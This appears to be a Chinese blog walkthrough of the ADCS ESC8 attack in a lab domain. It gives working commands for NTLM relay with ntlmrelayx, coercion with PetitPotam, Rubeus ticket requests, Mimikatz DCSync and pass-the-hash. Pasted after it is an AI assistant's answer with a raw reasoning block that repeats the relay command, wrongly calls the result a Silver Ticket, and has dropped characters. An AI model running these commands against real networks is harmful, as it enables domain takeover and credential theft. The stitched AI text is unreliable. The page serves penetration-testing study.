ADCS-ESC8漏洞利用

原理

在默认配置下,Web 证书注册页面仅采用 HTTP 协议进行通信,同时支持使用 NTLM 身份验证机制来确认用户身份。然而,该页面并未启用任何针对 NTLM Relay 攻击的防护措施,攻击者可以通过中继受害者的认证请求,伪装成受害者向证书颁发机构(CA)请求证书,从而实现持久化的权限提升或域控接管。

漏洞利用条件

ADCS Web Enrollment 启用: 目标环境中存在启用了 Web 注册功能的证书颁发机构(CA),通常访问路径为 http://<CA服务器>/certsrv/。

NTLM 认证支持: Web 端点支持 NTLM 认证,且未强制启用 HTTPS 或扩展保护(Extended Protection for Authentication, EPA),这使得 NTLM 中继攻击成为可能。

证书模板可用: CA 上至少有一个已发布的证书模板允许客户端认证(Client Authentication)或域计算机注册(Domain Computer Enrollment),例如默认的 Machine 或 DomainController 模板。

漏洞环境验证

ADCS默认存在http://<CA服务器>/certsrv/

访问http://<CA服务器>/certsrv/certfnsh.asp页面

漏洞利用

环境介绍

域控:192.168.110.127

证书服务器:192.168.110.153

域内主机:192.168.110.222

域外kali:192.168.110.155

攻击过程

在域外kali上执行

使用impacket中的ntlmrelayx.py进行监听

python ntlmrelayx.py -t http://192.168.110.153/certsrv/certfnsh.asp --adcs --template DomainController

使用 PetitPotam 诱导DC向攻击者认证

python PetitPotam.py 192.168.110.155 192.168.110.127 -d lutra.com

ntlmrelayx.py捕获并中继认证到CA,请求DomainController模板的证书。

在域内主机上执行

获得证书后,使用Rubeus请求TGT

Rubeus.exe asktgt /user:D1C$ /certificate:dc.pfx /dc:192.168.110.127 /ptt

使用klist查看缓存的票据

使用Mimikatz执行DCSync获取域内所有用户的NTLM Hash

发起PTH攻击,发现域内普通账户没有权限

切换到当前域内主机本地管理员账户进行操作

PTH攻击后,已经有权限访问域控目录

03-28
<think>好的,用户的问题是关于ADCS的,他们可能遇到了拼写错误或者对缩写不理解的情况。首先,我需要确认ADCS的含义。根据提供的引用,ADCS指的是Active Directory Certificate Services,即活动目录证书服务。用户可能是在内网安全或渗透测试的上下文中遇到这个术语,所以需要详细解释ADCS的基本概念、功能以及相关安全风险。 接下来,用户提供的引用中有多个关于ADCS利用和配置的信息,比如证书模板的安全性问题、NTLM中继攻击和安装配置步骤。需要将这些信息整合起来,说明ADCS环境中的作用,以及攻击者可能利用漏洞,比如证书模板权限配置不当导致的权限提升。 然后,用户可能想知道ADCS的具体应用场景和为什么在安全研究中重要。需要结合引用中的案例,如AD CS Relay攻击,说明攻击者如何通过获取证书来进一步入侵控,强调正确配置ADCS的重要性。 最后,生成相关问题时要覆盖ADCS的基础知识、安全配置、攻击方式和防御措施,确保问题能够帮助用户全面理解ADCS的相关内容。</think>ADCS是Active Directory Certificate Services(活动目录证书服务)的缩写,它是Windows Server提供的用于创建、管理和颁发数字证书的核心服务[^4]。该服务通过公钥基础设施(PKI)为环境提供身份验证、数据加密和数字签名功能。 ### 核心功能解析 1. **证书颁发** 可创建多种类型的数字证书,包括: - 用户身份验证证书(如智能卡登录) - 服务器SSL证书(用于IIS等Web服务) - 代码签名证书(验证软件来源可靠性) 2. **证书模板管理** 证书模板作为AD安全对象,其权限配置至关重要。错误配置可能导致安全风险,例如: ```powershell # 查看证书模板权限的命令示例 Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Filter * -Properties ntSecurityDescriptor ``` 若低权限用户拥有`Write`权限,可能被用于伪造证书[^3]。 3. **证书吊销列表(CRL)** 通过定期发布的CRL实现证书状态验证,错误配置可能导致证书吊销机制失效。 ### 安全风险场景 1. **NTLM中继攻击** 攻击者利用ADCS服务作为中继目标,获取控证书: ```bash # 使用impacket工具进行中继攻击示例 ntlmrelayx.py -t https://adcs-server/certsrv/certfnsh.asp --adcs --template DomainController ``` 成功后可生成银票(Silver Ticket)进行持久化控制[^1][^2]。 2. **证书模板滥用** 当证书模板配置允许低权限用户注册控制器证书时,攻击者可能通过Web Enrollment接口(通常位于`/certsrv/`)申请高权限证书[^3]。 ### 防御建议 1. 定期审计证书模板权限 2. 禁用不必要的Web Enrollment服务 3. 配置CRL分发点(CDP)和授权信息访问(AIA)路径 4. 保持ADCS服务器补丁更新
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值